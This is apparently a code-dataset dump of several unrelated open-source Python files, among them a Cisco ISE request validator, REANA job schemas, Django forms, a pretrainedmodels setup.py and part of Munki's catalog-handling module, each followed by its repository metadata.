net_small_inflows = Column(Float)
net_small_inflow_rate = Column(Float)
register_schema(providers=['sina'], db_name='money_flow', schema_base=MoneyFlowBase)
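
# Illustrative usage sketch (commented out): zvt Mixin-based schemas normally
# expose record_data()/query_data(); the provider and code below are assumptions.
#
#     StockMoneyFlow.record_data(provider='sina', codes=['000001'])
#     df = StockMoneyFlow.query_data(provider='sina', codes=['000001'])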
# the __all__ is generated
__all__ = ['BlockMoneyFlow', 'StockMoneyFlow']
| 24 | 84 | 0.700893 | [
"MIT"
] | Bruce-Dudu/zvt | zvt/domain/misc/money_flow.py | 2,132 | Python |
# -*- coding: utf-8 -*-
"""Identity Services Engine getAllowedProtocolById data model.
Copyright (c) 2021 Cisco and/or its affiliates.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from __future__ import (
absolute_import,
division,
print_function,
unicode_literals,
)
import fastjsonschema
import json
from ciscoisesdk.exceptions import MalformedRequest
from builtins import *
class JSONSchemaValidatorE3DdfDdd45E299F14Ed194926F8De(object):
"""getAllowedProtocolById request schema definition."""
def __init__(self):
super(JSONSchemaValidatorE3DdfDdd45E299F14Ed194926F8De, self).__init__()
self._validator = fastjsonschema.compile(json.loads(
'''{
"$schema": "http://json-schema.org/draft-04/schema#",
"properties": {
"AllowedProtocols": {
"properties": {
"allowChap": {
"type": "boolean"
},
"allowEapFast": {
"type": "boolean"
},
"allowEapMd5": {
"type": "boolean"
},
"allowEapTls": {
"type": "boolean"
},
"allowEapTtls": {
"type": "boolean"
},
"allowLeap": {
"type": "boolean"
},
"allowMsChapV1": {
"type": "boolean"
},
"allowMsChapV2": {
"type": "boolean"
},
"allowPapAscii": {
"type": "boolean"
},
"allowPeap": {
"type": "boolean"
},
"allowPreferredEapProtocol": {
"type": "boolean"
},
"allowTeap": {
"type": "boolean"
},
"allowWeakCiphersForEap": {
"type": "boolean"
},
"description":
{
"type": "string"
},
"eapFast": {
"properties": {
"allowEapFastEapGtc": {
"type": "boolean"
},
"allowEapFastEapGtcPwdChange": {
"type": "boolean"
},
"allowEapFastEapGtcPwdChangeRetries": {
"type": "integer"
},
"allowEapFastEapMsChapV2": {
"type": "boolean"
},
"allowEapFastEapMsChapV2PwdChange": {
"type": "boolean"
},
"allowEapFastEapMsChapV2PwdChangeRetries": {
"type": "integer"
},
"allowEapFastEapTls": {
"type": "boolean"
},
"allowEapFastEapTlsAuthOfExpiredCerts": {
"type": "boolean"
},
"eapFastEnableEAPChaining": {
"type": "boolean"
},
"eapFastUsePacs": {
"type": "boolean"
},
"eapFastUsePacsAllowAnonymProvisioning": {
"type": "boolean"
},
"eapFastUsePacsAllowAuthenProvisioning": {
"type": "boolean"
},
"eapFastUsePacsAllowMachineAuthentication": {
"type": "boolean"
},
"eapFastUsePacsStatelessSessionResume": {
"type": "boolean"
},
"eapFastUsePacsTunnelPacTtl": {
"type": "integer"
},
"eapFastUsePacsTunnelPacTtlUnits": {
"type": "string"
},
"eapFastUsePacsUseProactivePacUpdatePrecentage": {
"type": "integer"
}
},
"type": "object"
},
"eapTls": {
"properties": {
"allowEapTlsAuthOfExpiredCerts": {
"type": "boolean"
},
"eapTlsEnableStatelessSessionResume": {
"type": "boolean"
}
},
"type": "object"
},
"eapTlsLBit": {
"type": "boolean"
},
"eapTtls": {
"properties": {
"eapTtlsChap": {
"type": "boolean"
},
"eapTtlsEapMd5": {
"type": "boolean"
},
"eapTtlsEapMsChapV2": {
"type": "boolean"
},
"eapTtlsEapMsChapV2PwdChange": {
"type": "boolean"
},
"eapTtlsEapMsChapV2PwdChangeRetries": {
"type": "integer"
},
"eapTtlsMsChapV1": {
"type": "boolean"
},
"eapTtlsMsChapV2": {
"type": "boolean"
},
"eapTtlsPapAscii": {
"type": "boolean"
}
},
"type": "object"
},
"name": {
"type": "string"
},
"peap": {
"properties": {
"allowPeapEapGtc": {
"type": "boolean"
},
"allowPeapEapMsChapV2": {
"type": "boolean"
},
"allowPeapEapMsChapV2PwdChange": {
"type": "boolean"
},
"allowPeapEapMsChapV2PwdChangeRetries": {
"type": "integer"
},
"allowPeapEapTls": {
"type": "boolean"
},
"allowPeapEapTlsAuthOfExpiredCerts": {
"type": "boolean"
},
"allowPeapV0": {
"type": "boolean"
},
"requireCryptobinding": {
"type": "boolean"
}
},
"type": "object"
},
"preferredEapProtocol": {
"type": "string"
},
"processHostLookup": {
"type": "boolean"
},
"requireMessageAuth": {
"type": "boolean"
},
"teap": {
"properties": {
"acceptClientCertDuringTunnelEst": {
"type": "boolean"
},
"allowTeapEapMsChapV2": {
"type": "boolean"
},
"allowTeapEapMsChapV2PwdChange": {
"type": "boolean"
},
"allowTeapEapMsChapV2PwdChangeRetries": {
"type": "integer"
},
"allowTeapEapTls": {
"type": "boolean"
},
"allowTeapEapTlsAuthOfExpiredCerts": {
"type": "boolean"
},
"enableEapChaining": {
"type": "boolean"
},
"requestBasicPwdAuth": {
"type": "boolean"
}
},
"type": "object"
}
},
"type": "object"
}
},
"type": "object"
}'''.replace("\n" + ' ' * 16, '')
))
def validate(self, request):
try:
self._validator(request)
except fastjsonschema.exceptions.JsonSchemaException as e:
raise MalformedRequest(
'{} is invalid. Reason: {}'.format(request, e.message)
)
| 32.425993 | 80 | 0.416388 | [
"MIT"
] | oianson/ciscoisesdk | tests/models/validators/v3_0_0/jsd_e3ddfddd45e299f14ed194926f8de.py | 8,982 | Python |
#! /usr/bin/python3
# -*- coding: utf-8 -*-
# @Time : 2019/3/10 7:44 PM
# @Author : xiaoliji
# @Email : [email protected]
"""
Find two numbers in the array whose sum equals s.
>>> nums = [1, 2, 4, 7, 11, 15]
>>> FindNumbersWithSum(nums, 15)
(4, 11)
"""
def FindNumbersWithSum(array: list, tsum: int) -> tuple:
l, r = 0, len(array)-1
while l < r:
if array[l] + array[r] < tsum:
l += 1
elif array[l]+array[r] > tsum:
r -= 1
else:
return array[l], array[r]
    return () | 21.916667 | 56 | 0.48289 | [
"Apache-2.0"
] | ck76/awesome-cs | Algorithm/coding_interviews/Python/sword-for-offer/57_find_num_with_sum.py | 542 | Python |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# This file is part of REANA.
# Copyright (C) 2017, 2018, 2019, 2020, 2021, 2022 CERN.
#
# REANA is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""REANA Job Controller models."""
from marshmallow import Schema, fields, ValidationError, pre_load
from reana_commons.job_utils import deserialise_job_command
from reana_job_controller.config import (
REANA_KUBERNETES_JOBS_TIMEOUT_LIMIT,
REANA_KUBERNETES_JOBS_MAX_USER_TIMEOUT_LIMIT,
)
class Job(Schema):
"""Job model."""
cmd = fields.Str(required=True)
docker_img = fields.Str(required=True)
job_id = fields.Str(required=True)
max_restart_count = fields.Int(required=True)
restart_count = fields.Int(required=True)
status = fields.Str(required=True)
cvmfs_mounts = fields.String(missing="")
class JobRequest(Schema):
"""Job request model."""
job_name = fields.Str(required=True)
workflow_workspace = fields.Str(required=True)
workflow_uuid = fields.Str(required=True)
cmd = fields.Function(missing="", deserialize=deserialise_job_command)
prettified_cmd = fields.Str(missing="")
docker_img = fields.Str(required=True)
cvmfs_mounts = fields.String(missing="")
env_vars = fields.Dict(missing={})
shared_file_system = fields.Bool(missing=True)
compute_backend = fields.Str(required=False)
kerberos = fields.Bool(required=False)
voms_proxy = fields.Bool(required=False)
kubernetes_uid = fields.Int(required=False)
kubernetes_memory_limit = fields.Str(required=False)
kubernetes_job_timeout = fields.Int(required=False)
unpacked_img = fields.Bool(required=False)
htcondor_max_runtime = fields.Str(required=False)
htcondor_accounting_group = fields.Str(required=False)
slurm_partition = fields.Str(required=False)
slurm_time = fields.Str(required=False)
@pre_load
def set_kubernetes_job_timeout(self, in_data, **kwargs):
"""Set kubernetes_job_timeout to a default value if not provided and validate the value.
Method receives the whole data dictionary but operates *only* on kubernetes_job_timeout.
Updated dictionary is returned.
"""
if "kubernetes_job_timeout" not in in_data:
try:
in_data["kubernetes_job_timeout"] = int(
REANA_KUBERNETES_JOBS_TIMEOUT_LIMIT
)
except (ValueError, TypeError):
raise ValidationError(
"Default value of kubernetes_job_timeout is not an integer. "
f"Provided value is '{REANA_KUBERNETES_JOBS_TIMEOUT_LIMIT}'. "
"Please contact the administrator."
)
job_timeout = in_data["kubernetes_job_timeout"]
try:
job_timeout = int(job_timeout)
except (ValueError, TypeError):
raise ValidationError(
f"kubernetes_job_timeout must be an integer. Provided value is '{job_timeout}'."
)
if job_timeout <= 0:
raise ValidationError(
"kubernetes_job_timeout must be greater than 0."
f"Provided value is {job_timeout}."
)
try:
max_value = int(REANA_KUBERNETES_JOBS_MAX_USER_TIMEOUT_LIMIT)
except (ValueError, TypeError):
raise ValidationError(
"Max value for kubernetes_job_timeout is not an integer. "
f"Provided value is '{REANA_KUBERNETES_JOBS_MAX_USER_TIMEOUT_LIMIT}'. "
"Please contact the administrator."
)
if job_timeout > max_value:
raise ValidationError(
f"kubernetes_job_timeout exceeds maximum allowed value of {max_value} seconds. "
f"Provided value is {job_timeout} seconds."
)
in_data["kubernetes_job_timeout"] = job_timeout
return in_data
| 37.203704 | 96 | 0.664759 | [
"MIT"
] | focilo/focilo-job-controller | reana_job_controller/schemas.py | 4,018 | Python |
from django import forms
from models import *
class QuestionForm(forms.ModelForm):
def __init__(self, user = None, *args, **kwargs):
self.user = user
super(QuestionForm, self).__init__(*args, **kwargs)
def save(self):
question = Question(user = self.user, category = self.cleaned_data['category'], title =self.cleaned_data['title'], description = self.cleaned_data['description'])
question.save()
return question
class Meta:
model = Question
exclude = ('user', 'is_open')
class CategoryForm(forms.ModelForm):
class Meta:
model = Category
        exclude = ('slug',)
class AnswerForm(forms.Form):
def __init__(self, user = None, question = None, *args, **kwargs):
super(AnswerForm, self).__init__(*args, **kwargs)
self.user = user
self.question = question
def save(self):
answer = Answer(text = self.cleaned_data['answer'])
answer.user = self.user
answer.question = self.question
answer.save()
return answer
answer = forms.CharField(widget = forms.Textarea)
class ProfileImageForm(forms.ModelForm):
class Meta:
model = UserProfile
exclude = ('best_answers', 'answers', 'points', 'user')
| 31.136364 | 171 | 0.587591 | [
"BSD-3-Clause"
] | agiliq/django-answrs | answrs/aforms.py | 1,370 | Python |
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "vote_project.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
| 35.217391 | 77 | 0.644444 | [
"MIT"
] | dasap89/django_test_tutorial | vote_project/manage.py | 810 | Python |
"""A setuptools based setup module.
See:
https://packaging.python.org/en/latest/distributing.html
https://github.com/pypa/sampleproject
"""
# Always prefer setuptools over distutils
from setuptools import setup, find_packages
# To use a consistent encoding
from codecs import open
from os import path
here = path.abspath(path.dirname(__file__))
# Get the long description from the README file
with open(path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
# Arguments marked as "Required" below must be included for upload to PyPI.
# Fields marked as "Optional" may be commented out.
# https://stackoverflow.com/questions/458550/standard-way-to-embed-version-into-python-package/16084844#16084844
exec(open('pretrainedmodels/version.py').read())
setup(
# This is the name of your project. The first time you publish this
# package, this name will be registered for you. It will determine how
# users can install this project, e.g.:
#
# $ pip install sampleproject
#
# And where it will live on PyPI: https://pypi.org/project/sampleproject/
#
# There are some restrictions on what makes a valid project name
# specification here:
# https://packaging.python.org/specifications/core-metadata/#name
name='pretrainedmodels', # Required
# Versions should comply with PEP 440:
# https://www.python.org/dev/peps/pep-0440/
#
# For a discussion on single-sourcing the version across setup.py and the
# project code, see
# https://packaging.python.org/en/latest/single_source_version.html
version=__version__, # Required
# This is a one-line description or tagline of what your project does. This
# corresponds to the "Summary" metadata field:
# https://packaging.python.org/specifications/core-metadata/#summary
description='Pretrained models for Pytorch', # Required
# This is an optional longer description of your project that represents
# the body of text which users will see when they visit PyPI.
#
# Often, this is the same as your README, so you can just read it in from
# that file directly (as we have already done above)
#
# This field corresponds to the "Description" metadata field:
# https://packaging.python.org/specifications/core-metadata/#description-optional
long_description=long_description, # Optional
# This should be a valid link to your project's main homepage.
#
# This field corresponds to the "Home-Page" metadata field:
# https://packaging.python.org/specifications/core-metadata/#home-page-optional
url='https://github.com/cadene/pretrained-models.pytorch', # Optional
# This should be your name or the name of the organization which owns the
# project.
author='Remi Cadene', # Optional
# This should be a valid email address corresponding to the author listed
# above.
author_email='[email protected]', # Optional
# Classifiers help users find your project by categorizing it.
#
# For a list of valid classifiers, see
# https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[ # Optional
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 3 - Alpha',
# Indicate who your project is intended for
'Intended Audience :: Developers',
'Topic :: Software Development :: Build Tools',
# Pick your license as you wish
'License :: OSI Approved :: MIT License',
# Specify the Python versions you support here. In particular, ensure
# that you indicate whether you support Python 2, Python 3 or both.
'Programming Language :: Python :: 3.6',
],
# This field adds keywords for your project which will appear on the
# project page. What does your project relate to?
#
# Note that this is a string of words separated by whitespace, not a list.
keywords='pytorch pretrained models deep learning', # Optional
# You can just specify package directories manually here if your project is
# simple. Or you can use find_packages().
#
# Alternatively, if you just want to distribute a single Python file, use
# the `py_modules` argument instead as follows, which will expect a file
# called `my_module.py` to exist:
#
# py_modules=["my_module"],
#
packages=find_packages(exclude=['data', 'examples']), # Required
# This field lists other packages that your project depends on to run.
# Any package you put here will be installed by pip when your project is
# installed, so they must be valid existing projects.
#
# For an analysis of "install_requires" vs pip's requirements files see:
# https://packaging.python.org/en/latest/requirements.html
install_requires=['torch', 'torchvision', 'munch', 'tqdm'], # Optional
# List additional groups of dependencies here (e.g. development
# dependencies). Users will be able to install these using the "extras"
# syntax, for example:
#
# $ pip install sampleproject[dev]
#
# Similar to `install_requires` above, these must be valid existing
# projects.
# extras_require={ # Optional
# 'dev': ['check-manifest'],
# 'test': ['coverage'],
# },
# If there are data files included in your packages that need to be
# installed, specify them here.
#
# If using Python 2.6 or earlier, then these have to be included in
# MANIFEST.in as well.
# package_data={ # Optional
# 'sample': ['package_data.dat'],
# },
# Although 'package_data' is the preferred approach, in some case you may
# need to place data files outside of your packages. See:
# http://docs.python.org/3.4/distutils/setupscript.html#installing-additional-files
#
# In this case, 'data_file' will be installed into '<sys.prefix>/my_data'
#data_files=[('my_data', ['data/data_file'])], # Optional
# To provide executable scripts, use entry points in preference to the
# "scripts" keyword. Entry points provide cross-platform support and allow
# `pip` to create the appropriate form of executable for the target
# platform.
#
# For example, the following would provide a command called `sample` which
# executes the function `main` from this package when invoked:
# entry_points={ # Optional
# 'console_scripts': [
# 'sample=sample:main',
# ],
# },
)
| 39.626506 | 112 | 0.686683 | [
"BSD-3-Clause"
] | AkatsukiCC/pretrained-models.pytorch | setup.py | 6,578 | Python |
# encoding: utf-8
#
# Copyright 2009-2020 Greg Neagle.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
updatecheck.catalogs
Created by Greg Neagle on 2017-01-01.
Functions for working with Munki catalogs
"""
from __future__ import absolute_import, print_function
import os
from . import download
from .. import display
from .. import info
from .. import pkgutils
from .. import prefs
from .. import utils
from .. import FoundationPlist
from ..wrappers import is_a_string
def make_catalog_db(catalogitems):
"""Takes an array of catalog items and builds some indexes so we can
get our common data faster. Returns a dict we can use like a database"""
name_table = {}
pkgid_table = {}
itemindex = -1
for item in catalogitems:
itemindex = itemindex + 1
name = item.get('name', 'NO NAME')
vers = item.get('version', 'NO VERSION')
if name == 'NO NAME' or vers == 'NO VERSION':
display.display_warning('Bad pkginfo: %s', item)
# normalize the version number
vers = pkgutils.trim_version_string(vers)
# build indexes for items by name and version
if not name in name_table:
name_table[name] = {}
if not vers in name_table[name]:
name_table[name][vers] = []
name_table[name][vers].append(itemindex)
# build table of receipts
for receipt in item.get('receipts', []):
if 'packageid' in receipt and 'version' in receipt:
pkg_id = receipt['packageid']
version = receipt['version']
if not pkg_id in pkgid_table:
pkgid_table[pkg_id] = {}
if not version in pkgid_table[pkg_id]:
pkgid_table[pkg_id][version] = []
pkgid_table[pkg_id][version].append(itemindex)
# build table of update items with a list comprehension --
# filter all items from the catalogitems that have a non-empty
# 'update_for' list
updaters = [item for item in catalogitems if item.get('update_for')]
# now fix possible admin errors where 'update_for' is a string instead
# of a list of strings
for update in updaters:
if is_a_string(update['update_for']):
# convert to list of strings
update['update_for'] = [update['update_for']]
# build table of autoremove items with a list comprehension --
# filter all items from the catalogitems that have a non-empty
# 'autoremove' list
# autoremove items are automatically removed if they are not in the
# managed_install list (either directly or indirectly via included
# manifests)
autoremoveitems = [item.get('name') for item in catalogitems
if item.get('autoremove')]
# convert to set and back to list to get list of unique names
autoremoveitems = list(set(autoremoveitems))
pkgdb = {}
pkgdb['named'] = name_table
pkgdb['receipts'] = pkgid_table
pkgdb['updaters'] = updaters
pkgdb['autoremoveitems'] = autoremoveitems
pkgdb['items'] = catalogitems
return pkgdb
def add_package_ids(catalogitems, itemname_to_pkgid, pkgid_to_itemname):
"""Adds packageids from each catalogitem to two dictionaries.
One maps itemnames to receipt pkgids, the other maps receipt pkgids
to itemnames"""
for item in catalogitems:
name = item.get('name')
if not name:
continue
if item.get('receipts'):
if not name in itemname_to_pkgid:
itemname_to_pkgid[name] = {}
for receipt in item['receipts']:
if 'packageid' in receipt and 'version' in receipt:
pkgid = receipt['packageid']
vers = receipt['version']
if not pkgid in itemname_to_pkgid[name]:
itemname_to_pkgid[name][pkgid] = []
if not vers in itemname_to_pkgid[name][pkgid]:
itemname_to_pkgid[name][pkgid].append(vers)
if not pkgid in pkgid_to_itemname:
pkgid_to_itemname[pkgid] = {}
if not name in pkgid_to_itemname[pkgid]:
pkgid_to_itemname[pkgid][name] = []
if not vers in pkgid_to_itemname[pkgid][name]:
pkgid_to_itemname[pkgid][name].append(vers)
def split_name_and_version(some_string):
"""Splits a string into the name and version number.
Name and version must be separated with a hyphen ('-')
or double hyphen ('--').
'TextWrangler-2.3b1' becomes ('TextWrangler', '2.3b1')
'AdobePhotoshopCS3--11.2.1' becomes ('AdobePhotoshopCS3', '11.2.1')
'MicrosoftOffice2008-12.2.1' becomes ('MicrosoftOffice2008', '12.2.1')
"""
for delim in ('--', '-'):
if some_string.count(delim) > 0:
chunks = some_string.split(delim)
vers = chunks.pop()
name = delim.join(chunks)
if vers[0] in '0123456789':
return (name, vers)
return (some_string, '')
def get_all_items_with_name(name, cataloglist):
"""Searches the catalogs in a list for all items matching a given name.
Returns:
list of pkginfo items; sorted with newest version first. No precedence
is given to catalog order.
"""
def item_version(item):
"""Returns a MunkiLooseVersion for pkginfo item"""
return pkgutils.MunkiLooseVersion(item['version'])
itemlist = []
# we'll throw away any included version info
name = split_name_and_version(name)[0]
display.display_debug1('Looking for all items matching: %s...', name)
for catalogname in cataloglist:
if not catalogname in list(_CATALOG.keys()):
# in case catalogname refers to a non-existent catalog...
continue
# is name in the catalog name table?
if name in _CATALOG[catalogname]['named']:
versionsmatchingname = _CATALOG[catalogname]['named'][name]
for vers in versionsmatchingname:
if vers == 'latest':
continue
indexlist = _CATALOG[catalogname]['named'][name][vers]
for index in indexlist:
thisitem = _CATALOG[catalogname]['items'][index]
if not thisitem in itemlist:
display.display_debug1(
'Adding item %s, version %s from catalog %s...',
name, thisitem['version'], catalogname)
itemlist.append(thisitem)
if itemlist:
# sort so latest version is first
itemlist.sort(key=item_version, reverse=True)
return itemlist
def get_auto_removal_items(installinfo, cataloglist):
"""Gets a list of items marked for automatic removal from the catalogs
in cataloglist. Filters those against items in the processed_installs
list, which should contain everything that is supposed to be installed.
Then filters against the removals list, which contains all the removals
that have already been processed.
"""
autoremovalnames = []
for catalogname in cataloglist or []:
if catalogname in list(_CATALOG.keys()):
autoremovalnames += _CATALOG[catalogname]['autoremoveitems']
processed_installs_names = [split_name_and_version(item)[0]
for item in installinfo['processed_installs']]
autoremovalnames = [item for item in autoremovalnames
if item not in processed_installs_names
and item not in installinfo['processed_uninstalls']]
return autoremovalnames
def look_for_updates(itemname, cataloglist):
"""Looks for updates for a given manifest item that is either
installed or scheduled to be installed or removed. This handles not only
specific application updates, but also updates that aren't simply
later versions of the manifest item.
For example, AdobeCameraRaw is an update for Adobe Photoshop, but
doesn't update the version of Adobe Photoshop.
Returns a list of manifestitem names that are updates for
manifestitem.
"""
display.display_debug1('Looking for updates for: %s', itemname)
# get a list of catalog items that are updates for other items
update_list = []
for catalogname in cataloglist:
if catalogname not in _CATALOG:
# in case the list refers to a non-existent catalog
continue
updaters = _CATALOG[catalogname]['updaters']
# list comprehension coming up...
update_items = [catalogitem['name']
for catalogitem in updaters
if itemname in catalogitem.get('update_for', [])]
if update_items:
update_list.extend(update_items)
# make sure the list has only unique items:
update_list = list(set(update_list))
if update_list:
# updates were found, so let's display them
num_updates = len(update_list)
# format the update list for better on-screen viewing
update_list_display = ", ".join(str(x) for x in update_list)
display.display_debug1(
'Found %s update(s): %s', num_updates, update_list_display)
return update_list
def look_for_updates_for_version(itemname, itemversion, cataloglist):
"""Looks for updates for a specific version of an item. Since these
can appear in manifests and pkginfo as item-version or item--version
we have to search twice."""
name_and_version = '%s-%s' % (itemname, itemversion)
alt_name_and_version = '%s--%s' % (itemname, itemversion)
update_list = look_for_updates(name_and_version, cataloglist)
update_list.extend(look_for_updates(alt_name_and_version, cataloglist))
# make sure the list has only unique items:
update_list = list(set(update_list))
return update_list
def best_version_match(vers_num, item_dict):
    '''Attempts to find the best match in item_dict for vers_num.
    item_dict maps candidate item names to iterables of version strings;
    e.g. best_version_match('5.3.1', {'Foo': ['5.3'], 'Bar': ['4.2']}) -> 'Foo'.
    '''
vers_tuple = vers_num.split('.')
precision = 1
while precision <= len(vers_tuple):
test_vers = '.'.join(vers_tuple[0:precision])
match_names = []
for item in item_dict.keys():
for item_version in item_dict[item]:
if (item_version.startswith(test_vers) and
item not in match_names):
match_names.append(item)
if len(match_names) == 1:
return match_names[0]
precision = precision + 1
return None
@utils.Memoize
def analyze_installed_pkgs():
"""Analyze catalog data and installed packages in an attempt to determine
what is installed."""
pkgdata = {}
itemname_to_pkgid = {}
pkgid_to_itemname = {}
for catalogname in _CATALOG:
catalogitems = _CATALOG[catalogname]['items']
add_package_ids(catalogitems, itemname_to_pkgid, pkgid_to_itemname)
# itemname_to_pkgid now contains all receipts (pkgids) we know about
# from items in all available catalogs
installedpkgs = pkgutils.getInstalledPackages()
installed = []
partiallyinstalled = []
installedpkgsmatchedtoname = {}
for name in itemname_to_pkgid:
# name is a Munki install item name
foundpkgcount = 0
for pkgid in itemname_to_pkgid[name]:
if pkgid in installedpkgs:
foundpkgcount += 1
if not name in installedpkgsmatchedtoname:
installedpkgsmatchedtoname[name] = []
# record this pkgid for Munki install item name
installedpkgsmatchedtoname[name].append(pkgid)
if foundpkgcount > 0:
if foundpkgcount == len(itemname_to_pkgid[name]):
# we found all receipts by pkgid on disk
installed.append(name)
else:
# we found only some receipts for the item
# on disk
partiallyinstalled.append(name)
# we pay special attention to the items that seem partially installed.
# we need to see if there are any packages that are unique to this item
# if there aren't, then this item probably isn't installed, and we're
# just finding receipts that are shared with other items.
for name in partiallyinstalled:
# get a list of pkgs for this item that are installed
pkgsforthisname = installedpkgsmatchedtoname[name]
# now build a list of all the pkgs referred to by all the other
# items that are either partially or entirely installed
allotherpkgs = []
for othername in installed:
allotherpkgs.extend(installedpkgsmatchedtoname[othername])
for othername in partiallyinstalled:
if othername != name:
allotherpkgs.extend(installedpkgsmatchedtoname[othername])
# use Python sets to find pkgs that are unique to this name
uniquepkgs = list(set(pkgsforthisname) - set(allotherpkgs))
if uniquepkgs:
installed.append(name)
# now filter partiallyinstalled to remove those items we moved to installed
partiallyinstalled = [item for item in partiallyinstalled
if item not in installed]
# build our reference table. For each item we think is installed,
# record the receipts on disk matched to the item
references = {}
for name in installed:
for pkgid in installedpkgsmatchedtoname[name]:
if not pkgid in references:
references[pkgid] = []
references[pkgid].append(name)
# look through all our installedpkgs, looking for ones that have not been
# attached to any Munki names yet
orphans = [pkgid for pkgid in installedpkgs if pkgid not in references]
# attempt to match orphans to Munki item names
matched_orphans = []
for pkgid in orphans:
if pkgid in pkgid_to_itemname:
installed_pkgid_version = installedpkgs[pkgid]
possible_match_items = pkgid_to_itemname[pkgid]
best_match = best_version_match(
installed_pkgid_version, possible_match_items)
if best_match:
matched_orphans.append(best_match)
# process matched_orphans
for name in matched_orphans:
if name not in installed:
installed.append(name)
if name in partiallyinstalled:
partiallyinstalled.remove(name)
for pkgid in installedpkgsmatchedtoname[name]:
if not pkgid in references:
references[pkgid] = []
if not name in references[pkgid]:
references[pkgid].append(name)
pkgdata['receipts_for_name'] = installedpkgsmatchedtoname
pkgdata['installed_names'] = installed
pkgdata['pkg_references'] = references
# left here for future debugging/testing use....
#pkgdata['itemname_to_pkgid'] = itemname_to_pkgid
#pkgdata['pkgid_to_itemname'] = pkgid_to_itemname
#pkgdata['partiallyinstalled_names'] = partiallyinstalled
#pkgdata['orphans'] = orphans
#pkgdata['matched_orphans'] = matched_orphans
#ManagedInstallDir = prefs.pref('ManagedInstallDir')
#pkgdatapath = os.path.join(ManagedInstallDir, 'PackageData.plist')
#try:
# FoundationPlist.writePlist(pkgdata, pkgdatapath)
#except FoundationPlist.NSPropertyListWriteException:
# pass
#catalogdbpath = os.path.join(ManagedInstallDir, 'CatalogDB.plist')
#try:
# FoundationPlist.writePlist(CATALOG, catalogdbpath)
#except FoundationPlist.NSPropertyListWriteException:
# pass
return pkgdata
def get_item_detail(name, cataloglist, vers='',
skip_min_os_check=False, suppress_warnings=False):
"""Searches the catalogs in list for an item matching the given name that
can be installed on the current hardware/OS (optionally skipping the
minimum OS check so we can return an item that requires a higher OS)
If no version is supplied, but the version is appended to the name
('TextWrangler--2.3.0.0.0') that version is used.
If no version is given at all, the latest version is assumed.
Returns a pkginfo item, or None.
"""
rejected_items = []
machine = info.getMachineFacts()
# condition check functions
def munki_version_ok(item):
'''Returns a boolean to indicate if the current Munki version is high
enough to install this item. If not, also adds the failure reason to
the rejected_items list.'''
if item.get('minimum_munki_version'):
min_munki_vers = item['minimum_munki_version']
display.display_debug1(
'Considering item %s, version %s '
'with minimum Munki version required %s',
item['name'], item['version'], min_munki_vers)
display.display_debug1(
'Our Munki version is %s', machine['munki_version'])
if (pkgutils.MunkiLooseVersion(machine['munki_version'])
< pkgutils.MunkiLooseVersion(min_munki_vers)):
reason = (
'Rejected item %s, version %s with minimum Munki version '
'required %s. Our Munki version is %s.'
% (item['name'], item['version'],
item['minimum_munki_version'], machine['munki_version']))
rejected_items.append(reason)
return False
return True
def os_version_ok(item, skip_min_os_check=False):
'''Returns a boolean to indicate if the item is ok to install under
the current OS. If not, also adds the failure reason to the
rejected_items list. If skip_min_os_check is True, skips the minimum os
version check.'''
# Is the current OS version >= minimum_os_version for the item?
if item.get('minimum_os_version') and not skip_min_os_check:
min_os_vers = item['minimum_os_version']
display.display_debug1(
'Considering item %s, version %s '
'with minimum os version required %s',
item['name'], item['version'], min_os_vers)
display.display_debug1(
'Our OS version is %s', machine['os_vers'])
if (pkgutils.MunkiLooseVersion(machine['os_vers']) <
pkgutils.MunkiLooseVersion(min_os_vers)):
# skip this one, go to the next
reason = (
'Rejected item %s, version %s with minimum os version '
'required %s. Our OS version is %s.'
% (item['name'], item['version'],
item['minimum_os_version'], machine['os_vers']))
rejected_items.append(reason)
return False
# current OS version <= maximum_os_version?
if item.get('maximum_os_version'):
max_os_vers = item['maximum_os_version']
display.display_debug1(
'Considering item %s, version %s '
'with maximum os version supported %s',
item['name'], item['version'], max_os_vers)
display.display_debug1(
'Our OS version is %s', machine['os_vers'])
if (pkgutils.MunkiLooseVersion(machine['os_vers']) >
pkgutils.MunkiLooseVersion(max_os_vers)):
# skip this one, go to the next
reason = (
'Rejected item %s, version %s with maximum os version '
'required %s. Our OS version is %s.'
% (item['name'], item['version'],
item['maximum_os_version'], machine['os_vers']))
rejected_items.append(reason)
return False
return True
def cpu_arch_ok(item):
'''Returns a boolean to indicate if the item is ok to install under
the current CPU architecture. If not, also adds the failure reason to
the rejected_items list.'''
if item.get('supported_architectures'):
display.display_debug1(
'Considering item %s, version %s '
